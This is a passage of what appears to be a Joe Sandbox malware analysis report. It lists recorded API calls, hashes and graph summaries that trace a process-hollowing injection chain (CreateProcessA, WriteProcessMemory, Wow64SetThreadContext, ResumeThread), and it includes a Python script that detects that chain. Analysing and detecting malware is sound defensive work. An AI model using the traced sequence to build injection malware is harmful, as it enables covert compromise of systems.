                                                                                        • Instruction Fuzzy Hash: 2F11F3B6D002099FDB10CF9AD844ADEFBF4EF48310F10842AE419A7210C375A545CFA5
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • GlobalMemoryStatusEx.KERNELBASE(?), ref: 0647E64F
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000008.00000002.1810543923.0000000006470000.00000040.00000800.00020000.00000000.sdmp, Offset: 06470000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_8_2_6470000_RegSvcs.jbxd
                                                                                        Similarity
                                                                                        • API ID: GlobalMemoryStatus
                                                                                        • String ID:
                                                                                        • API String ID: 1890195054-0
                                                                                        • Opcode ID: 7ec9a5699f674557d24734fbc96a83b5c52f73ad4cbc98f0c2e954972c912f2d
                                                                                        • Instruction ID: e585ba85b2b43ed66a3e130eb11a5238348da2fe4ddda15be2813b106053de89
                                                                                        • Opcode Fuzzy Hash: 7ec9a5699f674557d24734fbc96a83b5c52f73ad4cbc98f0c2e954972c912f2d
                                                                                        • Instruction Fuzzy Hash: FF11EFB1C006699BCB10DF9AC544BDEFBF4AF48324F14816AE918A7250D378AA44CFA5
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • GetModuleHandleW.KERNELBASE(00000000,?,?,?,?,?,?,?,0646AD44), ref: 0646AF7E
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000008.00000002.1810467919.0000000006460000.00000040.00000800.00020000.00000000.sdmp, Offset: 06460000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_8_2_6460000_RegSvcs.jbxd
                                                                                        Similarity
                                                                                        • API ID: HandleModule
                                                                                        • String ID:
                                                                                        • API String ID: 4139908857-0
                                                                                        • Opcode ID: a4f076915cc03cfafb58a3e41ab0db19bfbcaec56a670a429f7e8b80b039987b
                                                                                        • Instruction ID: 3344eb53bcebc5014b342c59ec321e74b9286d636481780982182098e6998758
                                                                                        • Opcode Fuzzy Hash: a4f076915cc03cfafb58a3e41ab0db19bfbcaec56a670a429f7e8b80b039987b
                                                                                        • Instruction Fuzzy Hash: D211F0B5D006498FDB14DF9AC444A9EFBF5EF48214F10842AE829B7210D379A585CFA2
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000008.00000002.1803879835.000000000142D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0142D000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_8_2_142d000_RegSvcs.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: c18797933601af831f6233a4ee6bbcd07560f850aaa6e4358d73ce0baafba940
                                                                                        • Instruction ID: bb0d27e08096b893c232ed937c11ed355fa4ee0d30f39bef1271899f0a0dccdb
                                                                                        • Opcode Fuzzy Hash: c18797933601af831f6233a4ee6bbcd07560f850aaa6e4358d73ce0baafba940
                                                                                        • Instruction Fuzzy Hash: 1D2133B1900240DFDB05DF98C9C0B27BF65FB84314F70C26AE9090A766C336D486C6A1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000008.00000002.1804119338.000000000164D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0164D000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_8_2_164d000_RegSvcs.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 1b96f1bf256db7f3ebde1fa1c7ccd46562e19e521eb0560dd735f1e9865feaa7
                                                                                        • Instruction ID: 98e22e39a5fa1743a736ab6a364f5fa2006cd71158779da4a0ec6ac00df9eba4
                                                                                        • Opcode Fuzzy Hash: 1b96f1bf256db7f3ebde1fa1c7ccd46562e19e521eb0560dd735f1e9865feaa7
                                                                                        • Instruction Fuzzy Hash: 18213471A04200DFCB15DF98D9C4B26BFA5FB94B14F20C56DD80A4B396C33AD447CA61
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000008.00000002.1803879835.000000000142D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0142D000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_8_2_142d000_RegSvcs.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                                        • Instruction ID: 85b4cd0fc2eaf6ad70428f164f99cf4c3b9d70502044eefdb26d6c4f2ebd0316
                                                                                        • Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                                        • Instruction Fuzzy Hash: 2211E176804280CFCB06CF44D9C4B26BF71FB84324F24C5AADC090B666C336D45ACBA2
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000008.00000002.1804119338.000000000164D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0164D000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_8_2_164d000_RegSvcs.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                        • Instruction ID: ff34c2e66364a978581a595e633778a17d1281cef81f938bd26a2a831a3ded09
                                                                                        • Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                        • Instruction Fuzzy Hash: B911BE75904280CFDB16CF54D9C4B15BF62FB44714F24C6AAD8094B756C33AD40ACB61
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Execution Graph

                                                                                        Execution Coverage:10.5%
                                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                                        Signature Coverage:0%
                                                                                        Total number of Nodes:247
                                                                                        Total number of Limit Nodes:8
                                                                                        execution_graph (rendered call graph; the raw node/edge list is omitted). Entry points and the API calls reachable from them, as recovered from the edge list:
                                                                                        • 990e398 -> 8fc03cc / 8fc03c0 / 8fc03d0 -> dispatcher 8fc040d / 8fc0401 / 8fc0410 / 8fc0476 -> wrappers 8fc0873 and 8fc08eb (CreateProcessA at 990ddc4..990ddd0), 8fc0b31 (VirtualAllocEx at 990da81..990da88), 8fc0df1 / 8fc0b1b / 8fc0ad8 / 8fc0a26 / 8fc1023 (WriteProcessMemory at 990db40..990db48), 8fc114a (ReadProcessMemory at 990dc30..990dc38), 8fc0a9f (Wow64SetThreadContext at 990d570 / 990d578), 8fc0a41 / 8fc09a7 (ResumeThread at 990d4c0..990d4c8), 8fc0b61 (Wow64SetThreadContext and ResumeThread). Together these form the process-hollowing sequence behind the "Injects a PE file into a foreign processes" signature.
                                                                                        • 8fc1658 -> 8fc18d8 / 8fc18d1 / 8fc18d4 (PostMessageW)
                                                                                        • 12f4668 -> 12f4779 -> 12f44b4 -> 12f5918 (CreateActCtxA)
                                                                                        • 12fd060 -> GetCurrentProcess, GetCurrentThread, GetCurrentProcess, GetCurrentThreadId
                                                                                        • 12fd6b0 -> DuplicateHandle
                                                                                        • 12facd0 -> 12fb000 (GetModuleHandleW); 12fb051 / 12fb060 -> 12fa150 -> 12fb240 (LoadLibraryExW)
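Joe Sandbox exports the execution graph above as a whitespace-separated list of node declarations ("<id> <address> [API name]") and "<from>-><to>" edges, which is awkward to read but easy to mine. The script below is an added example (it is not part of the Joe Sandbox report or of any Joe Sandbox tooling): it parses such a dump, computes the API calls reachable from each entry point, and flags entry points that reach the full CreateProcessA / VirtualAllocEx / WriteProcessMemory / Wow64SetThreadContext / ResumeThread chain, the process-hollowing pattern behind this report's injection signatures. The embedded input is an abridged excerpt constructed from this report's graph with intermediate nodes dropped; the token conventions (5-digit node ids, hex function addresses, capitalised API names, the "N API calls" annotation) are assumptions inferred from this dump, and the CREATE_SUSPENDED flag is not visible in the graph, only in the report's signature list.

```python
import re
from collections import defaultdict

# Abridged excerpt of this report's execution_graph dump (constructed from the page;
# intermediate nodes dropped). Node declarations "<id> <addr> [APIName...]" and
# edges "<from>-><to>", whitespace separated.
SAMPLE = """execution_graph 30808 990e398 30813 8fc03cc 30808->30813 30814 8fc03e5 30813->30814
30834 8fc040d 30814->30834 30835 8fc042a 30834->30835 30909 8fc0a41 30835->30909
30933 8fc114a 30835->30933 30938 8fc0873 30835->30938 30945 8fc0df1 30835->30945
30951 8fc0b31 30835->30951 30967 8fc0a9f 30835->30967 30823 8fc040d 18 API calls 30821->30823
30910 8fc0a6a 30909->30910 30912 990d4c0 ResumeThread 30910->30912
31025 990dc30 30933->31025 31026 990dc36 ReadProcessMemory 31025->31026
30939 8fc0885 30938->30939 30941 990ddd0 CreateProcessA 30939->30941
30946 8fc111e 30945->30946 30948 990db40 WriteProcessMemory 30946->30948
31037 990da81 30951->31037 31038 990da86 VirtualAllocEx 31037->31038
30969 990d570 Wow64SetThreadContext 30967->30969
31049 12fd060 31050 12fd0a6 GetCurrentProcess 31049->31050 31052 12fd0f8 GetCurrentThread 31050->31052
31075 12facd0 31082 12fadf4 31075->31082 31083 12fb000 GetModuleHandleW 31082->31083"""

NODE_ID = re.compile(r"^\d{5,}$")              # node ids in this dump are 5-digit integers (assumption)
EDGE = re.compile(r"^(\d+)->(\d+)$")
API_NAME = re.compile(r"^[A-Z][A-Za-z0-9]+$")  # e.g. Wow64SetThreadContext; "API" from "18 API calls" excluded below

# Calls whose joint presence under one entry point is the classic process-hollowing chain.
HOLLOWING_APIS = frozenset({"CreateProcessA", "VirtualAllocEx", "WriteProcessMemory",
                            "Wow64SetThreadContext", "ResumeThread"})


def parse_graph(text):
    """Return ({node_id: {"addr": str, "apis": [str]}}, [(from_id, to_id)])."""
    nodes, edges, current = {}, [], None
    toks = text.split()
    i = 0
    while i < len(toks):
        tok = toks[i]
        m = EDGE.match(tok)
        if m:
            edges.append((m.group(1), m.group(2)))
            current = None  # anything after an edge belongs to the next declaration
            i += 1
            continue
        if NODE_ID.match(tok) and i + 1 < len(toks) and not EDGE.match(toks[i + 1]):
            current = tok
            nodes[tok] = {"addr": toks[i + 1], "apis": []}
            i += 2
            continue
        if current is not None and tok != "API" and API_NAME.match(tok):
            nodes[current]["apis"].append(tok)  # API name annotated on the current node
        i += 1
    return nodes, edges


def build_succ(edges):
    succ = defaultdict(set)
    for a, b in edges:
        succ[a].add(b)
    return succ


def reachable_apis(nodes, succ, root):
    """All API names on nodes reachable from root (iterative DFS; the dump contains self-loops)."""
    seen, stack, apis = {root}, [root], set()
    while stack:
        n = stack.pop()
        apis.update(nodes.get(n, {}).get("apis", ()))
        for s in succ.get(n, ()):
            if s not in seen:
                seen.add(s)
                stack.append(s)
    return apis


def root_api_summary(text):
    """Map each entry point (declared node without a predecessor) to the sorted APIs it reaches."""
    nodes, edges = parse_graph(text)
    succ = build_succ(edges)
    has_pred = {b for _, b in edges}
    return {nodes[n]["addr"]: sorted(reachable_apis(nodes, succ, n))
            for n in nodes if n not in has_pred}


def hollowing_roots(text):
    """Entry points whose reachable API set covers the whole hollowing chain."""
    return {addr: apis for addr, apis in root_api_summary(text).items()
            if HOLLOWING_APIS <= set(apis)}


if __name__ == "__main__":
    for addr, apis in root_api_summary(SAMPLE).items():
        print(addr, "->", ", ".join(apis) or "(no API calls)")
    print("process-hollowing entry points:", sorted(hollowing_roots(SAMPLE)))
```

On the excerpt, 990e398 is the only entry point that reaches all five calls (plus ReadProcessMemory), while 12fd060 and 12facd0 only reach the handle and module-lookup APIs. Reachability rather than a strict call order is used on purpose: Joe Sandbox splits the same wrapper into several nodes (990db40 / 990db44 / 990db48 for WriteProcessMemory, for instance), so an order-sensitive match over node ids would miss the chain.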

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph (rendered graph; basic-block edge list omitted): blocks 12fd051-12fd22d, calling GetCurrentProcess (12fd051-12fd0ef), GetCurrentThread (12fd0f8-12fd12c), GetCurrentProcess (12fd135-12fd169), sub 12fd638 (12fd172-12fd18d) and GetCurrentThreadId (12fd193-12fd1c2)
                                                                                        APIs
                                                                                        • GetCurrentProcess.KERNEL32 ref: 012FD0DE
                                                                                        • GetCurrentThread.KERNEL32 ref: 012FD11B
                                                                                        • GetCurrentProcess.KERNEL32 ref: 012FD158
                                                                                        • GetCurrentThreadId.KERNEL32 ref: 012FD1B1
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000009.00000002.1823772736.00000000012F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012F0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_9_2_12f0000_dWXyZYb.jbxd
                                                                                        Similarity
                                                                                        • API ID: Current$ProcessThread
                                                                                        • String ID:
                                                                                        • API String ID: 2063062207-0
                                                                                        • Opcode ID: e669d246876046a453ca958af5f2c4028d3c9b657fab2fe3d06f2f7b94dc69cb
                                                                                        • Instruction ID: 1dd6e895345a3d437619baeb5c5cc678c4a23f093a1edc7d611bf5543fbe8559
                                                                                        • Opcode Fuzzy Hash: e669d246876046a453ca958af5f2c4028d3c9b657fab2fe3d06f2f7b94dc69cb
                                                                                        • Instruction Fuzzy Hash: 575144B09102498FDB18CFA9D548BEEBBF1AB88304F20846DD119AB360D7359889CF65
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph (rendered graph; basic-block edge list omitted): blocks 12fd060-12fd22d, calling GetCurrentProcess (12fd060-12fd0ef), GetCurrentThread (12fd0f8-12fd12c), GetCurrentProcess (12fd135-12fd169), sub 12fd638 (12fd172-12fd18d) and GetCurrentThreadId (12fd193-12fd1c2)
                                                                                        APIs
                                                                                        • GetCurrentProcess.KERNEL32 ref: 012FD0DE
                                                                                        • GetCurrentThread.KERNEL32 ref: 012FD11B
                                                                                        • GetCurrentProcess.KERNEL32 ref: 012FD158
                                                                                        • GetCurrentThreadId.KERNEL32 ref: 012FD1B1
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000009.00000002.1823772736.00000000012F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012F0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_9_2_12f0000_dWXyZYb.jbxd
                                                                                        Similarity
                                                                                        • API ID: Current$ProcessThread
                                                                                        • String ID:
                                                                                        • API String ID: 2063062207-0
                                                                                        • Opcode ID: 2289bdf22608dbd01d33757dbb9337ccdf4e2991e0a749dab9511eec0f848523
                                                                                        • Instruction ID: b605147e43ae56e4860d58b93033b7840ae671c8f71508dc376ac9cb7288157c
                                                                                        • Opcode Fuzzy Hash: 2289bdf22608dbd01d33757dbb9337ccdf4e2991e0a749dab9511eec0f848523
                                                                                        • Instruction Fuzzy Hash: 965124B0D102498FDB18DFA9D548B9EFBF1BB88304F208469D519AB360DB349988CB65
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph (rendered graph; basic-block edge list omitted): blocks 990ddc4-990e115; three self-looping blocks (990de85-990de94, 990dede-990deed, 990df46-990df55) precede the CreateProcessA call in block 990df5f-990e019, which branches to 990e01b-990e021 or 990e022-990e0a8
                                                                                        APIs
                                                                                        • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0990E006
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000009.00000002.1841265819.0000000009900000.00000040.00000800.00020000.00000000.sdmp, Offset: 09900000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_9_2_9900000_dWXyZYb.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateProcess
                                                                                        • String ID:
                                                                                        • API String ID: 963392458-0
                                                                                        • Opcode ID: e46fd8ac6a10a16c07a2f157819602e81d750c205dbfe751ef365624dc68fc37
                                                                                        • Instruction ID: 7f34543de4ae183889e94aa60fe4acdc81540d9490a4c600b22f27453e5db790
                                                                                        • Opcode Fuzzy Hash: e46fd8ac6a10a16c07a2f157819602e81d750c205dbfe751ef365624dc68fc37
                                                                                        • Instruction Fuzzy Hash: 26914A71D00219CFDF24CFA8C8517ADBBB6BF88314F1485A9E858A7290DB749985CF92
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph (rendered graph; basic-block edge list omitted): blocks 990ddc9-990e115; three self-looping blocks (990de85-990de94, 990dede-990deed, 990df46-990df55) precede the CreateProcessA call in block 990df5f-990e019, which branches to 990e01b-990e021 or 990e022-990e0a8
                                                                                        APIs
                                                                                        • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0990E006
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000009.00000002.1841265819.0000000009900000.00000040.00000800.00020000.00000000.sdmp, Offset: 09900000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_9_2_9900000_dWXyZYb.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateProcess
                                                                                        • String ID:
                                                                                        • API String ID: 963392458-0
                                                                                        • Opcode ID: cb70e65817c86bb6cb8c84eb1601c1a607eaa53707d1302ac445597978206544
                                                                                        • Instruction ID: f648dda47787637e72f95d400db0928552107be34ec9f4ed2f972e9d94d438d2
                                                                                        • Opcode Fuzzy Hash: cb70e65817c86bb6cb8c84eb1601c1a607eaa53707d1302ac445597978206544
                                                                                        • Instruction Fuzzy Hash: 9F915971D00219CFDF24CFA8C8517EDBBB6BF88314F1485A9E858A7290DB749985CF92
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Control-flow Graph: basic-block graph of the function beginning at 990ddd0 (graph data omitted; the block at 990df5f-990e019 calls CreateProcessA)
                                                                                        APIs
                                                                                        • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0990E006
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000009.00000002.1841265819.0000000009900000.00000040.00000800.00020000.00000000.sdmp, Offset: 09900000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_9_2_9900000_dWXyZYb.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateProcess
                                                                                        • String ID:
                                                                                        • API String ID: 963392458-0
                                                                                        • Opcode ID: 71610b05a28524e8c75a25aa25e7a53a7437ddf44705f42f6c861c080b8442fe
                                                                                        • Instruction ID: 3b263a3001441e9b89ddd357242008f828bba7b074ce08da90a4c08e3ac4b00b
                                                                                        • Opcode Fuzzy Hash: 71610b05a28524e8c75a25aa25e7a53a7437ddf44705f42f6c861c080b8442fe
                                                                                        • Instruction Fuzzy Hash: C6916B71D00219CFDF14CFA8C851BEDBBB6BF88314F1485A9E858A7290DB749985CF92
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Control-flow Graph: basic-block graph of the function beginning at 990ddcc (graph data omitted; the block at 990df5f-990e019 calls CreateProcessA)
                                                                                        APIs
                                                                                        • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0990E006
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000009.00000002.1841265819.0000000009900000.00000040.00000800.00020000.00000000.sdmp, Offset: 09900000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_9_2_9900000_dWXyZYb.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateProcess
                                                                                        • String ID:
                                                                                        • API String ID: 963392458-0
                                                                                        • Opcode ID: 0d60b5de3517e50bda82ffd55eca35158a08aa1c390f5f1fbeb4177e7c022284
                                                                                        • Instruction ID: e30f93380141859fa6d725cb0ca2685c39d682ea9816db0909e0ab0ebc7e4351
                                                                                        • Opcode Fuzzy Hash: 0d60b5de3517e50bda82ffd55eca35158a08aa1c390f5f1fbeb4177e7c022284
                                                                                        • Instruction Fuzzy Hash: C5915A71D00219CFDF24CFA8C8517EDBBB6BF88314F1485A9E858A7290DB749985CF92
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Control-flow Graph: basic-block graph of the function beginning at 12fadc8 (graph data omitted; the block at 12fb000-12fb02b calls GetModuleHandleW)
                                                                                        APIs
                                                                                        • GetModuleHandleW.KERNELBASE(00000000), ref: 012FB01E
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000009.00000002.1823772736.00000000012F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012F0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_9_2_12f0000_dWXyZYb.jbxd
                                                                                        Similarity
                                                                                        • API ID: HandleModule
                                                                                        • String ID:
                                                                                        • API String ID: 4139908857-0
                                                                                        • Opcode ID: 85b0388aa30d873c638781a3b626e2f9c4e0ad9eb8971ee080bd0b2fd988d201
                                                                                        • Instruction ID: 88a99a6645183b5d28e73f97eeb65969149222c4049da56b2f832541ddca29b1
                                                                                        • Opcode Fuzzy Hash: 85b0388aa30d873c638781a3b626e2f9c4e0ad9eb8971ee080bd0b2fd988d201
                                                                                        • Instruction Fuzzy Hash: 9E811670A10B068FDB24DF29D45579ABBF1FF88304F008A2DD68ADBA50D775E949CB90
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Control-flow Graph: basic-block graph of the function beginning at 12f590c (graph data omitted; the entry block 12f590c-12f59d9 calls CreateActCtxA)
                                                                                        APIs
                                                                                        • CreateActCtxA.KERNEL32(?), ref: 012F59C9
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000009.00000002.1823772736.00000000012F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012F0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_9_2_12f0000_dWXyZYb.jbxd
                                                                                        Similarity
                                                                                        • API ID: Create
                                                                                        • String ID:
                                                                                        • API String ID: 2289755597-0
                                                                                        • Opcode ID: 5d883dcbf5ae53c532c66e6dc5d3da40a4c02a810569e61f802355d6632d0a18
                                                                                        • Instruction ID: 1d979678c8b31d6b3e127bb24950a44f246d054279f86aa655a1df4b52152896
                                                                                        • Opcode Fuzzy Hash: 5d883dcbf5ae53c532c66e6dc5d3da40a4c02a810569e61f802355d6632d0a18
                                                                                        • Instruction Fuzzy Hash: DF41EDB1C10719CFDB28CFA9C984ADEBBF5BF49304F20816AD508AB251DB756985CF90
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Control-flow Graph: basic-block graph of the function beginning at 12f44b4 (graph data omitted; the entry block 12f44b4-12f59d9 calls CreateActCtxA)
                                                                                        APIs
                                                                                        • CreateActCtxA.KERNEL32(?), ref: 012F59C9
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000009.00000002.1823772736.00000000012F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012F0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_9_2_12f0000_dWXyZYb.jbxd
                                                                                        Similarity
                                                                                        • API ID: Create
                                                                                        • String ID:
                                                                                        • API String ID: 2289755597-0
                                                                                        • Opcode ID: 68f4e0357a221c67638f2df69b882c0cf0ccd120933099f712f2f1fa83e0b7c2
                                                                                        • Instruction ID: ef883cef55cc300c19515038a0961bf0bb722235ab9f9cbb2badd53e12d14c5e
                                                                                        • Opcode Fuzzy Hash: 68f4e0357a221c67638f2df69b882c0cf0ccd120933099f712f2f1fa83e0b7c2
                                                                                        • Instruction Fuzzy Hash: 5F41E0B0C1071DCBDB28CFA9C984A8DFBF5BF49304F20806AD508AB251DBB56985CF90
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0990DBD8
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000009.00000002.1841265819.0000000009900000.00000040.00000800.00020000.00000000.sdmp, Offset: 09900000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_9_2_9900000_dWXyZYb.jbxd
                                                                                        Similarity
                                                                                        • API ID: MemoryProcessWrite
                                                                                        • String ID:
                                                                                        • API String ID: 3559483778-0
                                                                                        • Opcode ID: e97c1870b359f04e75957d372f66d62377a5d7de417cbe68ae639e1687e72099
                                                                                        • Instruction ID: 2012be3afb6e2374c5a0a5f97185d75c34c6f4191f6a9d060b71c6fd387e75f0
                                                                                        • Opcode Fuzzy Hash: e97c1870b359f04e75957d372f66d62377a5d7de417cbe68ae639e1687e72099
                                                                                        • Instruction Fuzzy Hash: CB2146B5900319CFDB10CFA9C981BEEBBF5FF88310F14842AE959A7290D7789554CBA0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0990DBD8
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000009.00000002.1841265819.0000000009900000.00000040.00000800.00020000.00000000.sdmp, Offset: 09900000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_9_2_9900000_dWXyZYb.jbxd
                                                                                        Similarity
                                                                                        • API ID: MemoryProcessWrite
                                                                                        • String ID:
                                                                                        • API String ID: 3559483778-0
                                                                                        • Opcode ID: e48fa2c5ff13509b69eb306a846521a11e4208b43ba41d2aa234ceee08e6d670
                                                                                        • Instruction ID: d26714aa2bec80c198fbe527dd23eadd7d6c785a845448fba749459071cba821
                                                                                        • Opcode Fuzzy Hash: e48fa2c5ff13509b69eb306a846521a11e4208b43ba41d2aa234ceee08e6d670
                                                                                        • Instruction Fuzzy Hash: 792146B59003098FDB10CFA9C981BDEBBF5FF48310F14842AE958A7290D7789544CBA0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0990DBD8
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000009.00000002.1841265819.0000000009900000.00000040.00000800.00020000.00000000.sdmp, Offset: 09900000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_9_2_9900000_dWXyZYb.jbxd
                                                                                        Similarity
                                                                                        • API ID: MemoryProcessWrite
                                                                                        • String ID:
                                                                                        • API String ID: 3559483778-0
                                                                                        • Opcode ID: 96b66dd5dd800f1dbee3e81df99d90070371746daec452585b29d450017e2f48
                                                                                        • Instruction ID: fe22f9d0570e83b2732b33eab90de86847f4e0c6f15fbda42a56cbdfb0e2a263
                                                                                        • Opcode Fuzzy Hash: 96b66dd5dd800f1dbee3e81df99d90070371746daec452585b29d450017e2f48
                                                                                        • Instruction Fuzzy Hash: 8A2157B19003099FCB10DFA9C880BDEBBF5FF88310F148429E958A7290D778A944CBA4
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0990DCB8
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000009.00000002.1841265819.0000000009900000.00000040.00000800.00020000.00000000.sdmp, Offset: 09900000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_9_2_9900000_dWXyZYb.jbxd
                                                                                        Similarity
                                                                                        • API ID: MemoryProcessRead
                                                                                        • String ID:
                                                                                        • API String ID: 1726664587-0
                                                                                        • Opcode ID: b4109ca62d346e8f1b4cb3a5c99a5453eba537a7d93b1b0f017d3928f495785c
                                                                                        • Instruction ID: 5217b86039caa3be2c7cc69f07b94e2fd59d24b94e9c14ae37c91a16da5c5058
                                                                                        • Opcode Fuzzy Hash: b4109ca62d346e8f1b4cb3a5c99a5453eba537a7d93b1b0f017d3928f495785c
                                                                                        • Instruction Fuzzy Hash: DB2136B1C003199FCB10CFA9C9816EEBBF5FF48310F10842AE558A7290C7749545DBA0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0990D5F6
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000009.00000002.1841265819.0000000009900000.00000040.00000800.00020000.00000000.sdmp, Offset: 09900000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_9_2_9900000_dWXyZYb.jbxd
                                                                                        Similarity
                                                                                        • API ID: ContextThreadWow64
                                                                                        • String ID:
                                                                                        • API String ID: 983334009-0
                                                                                        • Opcode ID: a3e3eca8365f65ec1a89a7159d29447e70429bed90d40f3816b42e381c10490f
                                                                                        • Instruction ID: 07d63561f50c5c69352e842cc8d119db5402af11050350b593878613b64c4579
                                                                                        • Opcode Fuzzy Hash: a3e3eca8365f65ec1a89a7159d29447e70429bed90d40f3816b42e381c10490f
